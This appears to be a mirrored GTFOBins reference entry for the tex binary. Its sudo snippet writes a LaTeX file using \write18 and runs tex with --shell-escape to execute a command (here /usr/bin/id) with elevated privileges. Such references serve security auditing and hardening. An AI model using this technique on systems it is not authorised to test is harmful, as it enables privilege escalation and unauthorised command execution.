mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-01-02 21:51:39 +01:00
280 B
280 B
description: tex has a similar behaviour as pdftex
functions:
sudo:
- code: |
echo "\documentclass[12pt]{article} \begin{document} \write18{/usr/bin/id} \end{document}" > file.tex
tex -interaction=nonstopmode --shell-escape file.tex